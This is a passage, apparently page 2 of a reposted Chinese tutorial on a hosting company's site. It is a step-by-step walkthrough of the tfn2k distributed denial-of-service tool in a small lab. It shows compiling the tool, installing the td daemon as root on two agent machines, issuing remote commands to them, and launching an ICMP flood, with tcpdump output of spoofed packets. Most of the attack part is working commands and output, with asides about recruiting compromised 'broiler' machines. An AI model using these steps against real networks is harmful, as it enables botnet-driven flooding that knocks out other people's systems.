手机站
网通分站
电信主站
购物车
续租服务
在线提问
常见问题
付款方式
购买流程
忘记密码?
密 码:
用户名:
首 页
  域名注册
  虚拟主机
  智能建站主机
  服务器租用
  VPS主机
  企业邮局
  代理专区
  客服中心
当前位置 : 主页>操作系统>Linux>列表

分布式拒绝服务攻击(tfn2k)攻击及iptables过滤测试

来源:互联网 作者:west263.com 时间:2008-02-23
西部数码-全国虚拟主机10强!40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

  方法很简单的,找到一张redhat linux 6.2安装盘,将egcs-1.1.2-30.rpm、cpp-1.1.2-30.rpm拷到~/


    cd /mnt/cdrom/Redhat/RPMS
    cp egcs-1.1.2-30* cpp-1.1.2-30* ~/

  安装cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm

  安装egcs rpm -Uvh egcs-1.1.2-30.i386.rpm

  (如果提示有误,用nodeps、oldpackages、ignoreos等参数忽略过去就是了)

  4.编译tfn2k


    cd tfn2k/src
    make

  首先会谈出一个声明,你必须接受,之后会提示输入8-32位密码,前边提到过,这是唯一的认证凭证,会被分发于td进程中,所以一定要记牢噢~。

  编译通过后,会产生td及tfn,这就是大名鼎鼎的tfn2k啦~,td是守护进程,用来安装在代理中的,而tfn就是控制端.

  5.安装td.

  将td上传到我的两台代理,ag1(192.168.0.2)和ag2(192.168.0.3) ,因为我只不过测试,所以用的是合法的root来上传并执行td进程的,如果真要找到并安装一个代理,你可能得费点儿神,因为没有一个管理员会说 “come on baby ~~.我给你root,来安装td做代理吧”


   [root@test /] ftp 192.168.0.2
      Connected to 192.168.0.2.
      530 Please login with USER and PASS.
      530 Please login with USER and PASS.
      Name (192.168.0.2:root): wjpfjy
      331 Please specify the password.
      Password:
      230 Login successful. Have fun.
      Remote system type is UNIX.
      Using binary mode to transfer files.
    ftp> put td (上传td)
     local: td remote: td
     227 Entering Passive Mode (192,168,0,3,198,225)
     553 Could not create file.
    ftp> by (退出ftp)
     221 Goodbye.

   [root@test /]ssh 192.168.0.2
//登陆到ag1 以执行td ,注意,我用的是root帐户,这样才有足够的权限来执行它.
       root@192.168.0.2's password:
       Last login: Tue Feb 24 06:51:13 2004
   [root@ ag1 /]find / -name td -print
//找到刚上传过来的文件td.
   [root@ ag1 wjpfjy/]chmod a x td
//使之具有执行权限.
   [root@ ag1 wjpfjy/]./td
//运行td ,这样你就拥有一个代理了,它会对你唯命是从的:(。

  

  用同样的方法在ag2 (192.168.0.3)上安装并运行TFN2k进程td.   

  6.攻击开始(悲惨的回忆上演中...)

  回到master(192.168.0.6 ),准备演练...


   [root@master root]#touch host.txt
//建立代理记录文件(因为如果你足够无聊的话,有可能会建立很多的肉鸡-
//代理,不记下会忘记的噢.)
  [root@master root]echo "192.168.0.2" > host.txt 将执行过td的ag1加入host.txt。
  [root@master root]echo "192.168.0.3" >> host.txt 添加ag2到host.txt .

  先来测试一下链接。

  [root@master root]./tfn -f host.txt -c 10 -i "mkdir wjpfjy" 与host.txt中的代理通讯,让其执行命令mkdir wjpfjy即建立一个目录


   Protocol : random
    Source IP : random
    Client input : list
    Command : execute remote command

    Password verification:    
//这里,会被提示输入密码,也就是编译时输入的密码,如果错了,将无法与td进程通讯

    Sending out packets: ..

  到ag1和ag2看看有没有建立目录名wjpfjy,一般情况下,会存在于td的同一目录,如果不确定,可以用find / -name wjpfjy -print来查找   

  [root@master root]./tfn -f host.txt -c 6 -i 192.168.0.5 开始ICMP/PING 攻击aim...(可怜我的P4啊,不到5分钟,就跟386一样慢),不过它在game over前,还是很艰辛的记录下了攻击数据,也算是对得住的那NK大洋啦.这是tcpdump的抓包记录.


[root@aim root]# tcpdump -r pack.atta -c 4 -xX
08:03:36.524907 23.43.171.0 > 192.168.0.5 icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..\e........ ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0050 0000 ..
08:03:36.524933 192.168.0.5 > 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E..\....@.Q.....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000 . ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0050 0000 ..
08:03:36.524944 36.235.130.0 > 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..\e......n$...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0050 0000 ..
08:03:36.524984 192.168.0.5 > 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..\U...@.......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $...............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................

文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

上一页 1 23 下一页
[打印] [关闭]
Google
相关文章
  • Linux系统下架设CS服务器的完美
  • 安全管理Linux的一些措施
  • Linux 指令篇:DOS相容指令--mcd
  • Config HOWTO 系统设置 (1)
  • Linux 指令篇:日期时间排程--at
  • 汉化你的RedHat全攻略(4)- FAQ和
  • 系统管理:如何禁止RHEL AS4的图
  • 怎样让你的Linux使用起来更像Win
  • 分析Windows和Linux动态库
  • 如何给linux添加新硬盘
    • 热点关注
    IDC资讯 虚拟主机 域名注册 托管租用 vps主机 智能建站
    网站运营 建站经验 策划盈利 搜索优化 网站推广 免费资源
    网站联盟 联盟新闻 联盟介绍 联盟点评 网赚技巧
    行业资讯 业界动态 搜索引擎 网络游戏 门户动态 电子商务 广告传媒
    网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
    服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
    软件技巧 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
    网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
    程序设计 Java技术 C/C++ VB delphi
    网络知识 网络协议 网络安全 网络管理 组网方案 Cisco技术
    操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD
    返回首页 |关于我们 | 联系我们 | 付款方式 | 创业联盟 | 价格总览 | 资讯中心 | 友情链接 | 网站地图 | 招贤纳士 | RSS

    版权所有     西部数码(www.west263.com)
    CopyRight (c) 2002~2007 west263.com all right reserved.
    公司地址:四川成都市万和路90号天象大厦4楼 邮编:610031
    电话总机:028-86263408 86263960 86264018 86267838 86262244 86263408
    售前咨询:总机转201 202 203 204 205 206 207 208
    售后服务:总机转211 212 213 214 217 218 晚上0点以后拔分机225
    财务咨询:总机转224 223 传真:028-86264041 财务QQ:点击发送消息给对方635483282
    售前咨询QQ:点击发送消息给对方327314358 点击发送消息给对方241975952 点击发送消息给对方275026793 点击发送消息给对方408235859 点击发送消息给对方2182518 点击发送消息给对方499513144
    售后服务QQ:点击发送消息给对方634349278 点击发送消息给对方809071471 点击发送消息给对方307742704 点击发送消息给对方512359778 点击发送消息给对方287976517 点击发送消息给对方363783715     在线咨询
    《中华人民共和国增值电信业务经营许可证》编号:川B2-20030065号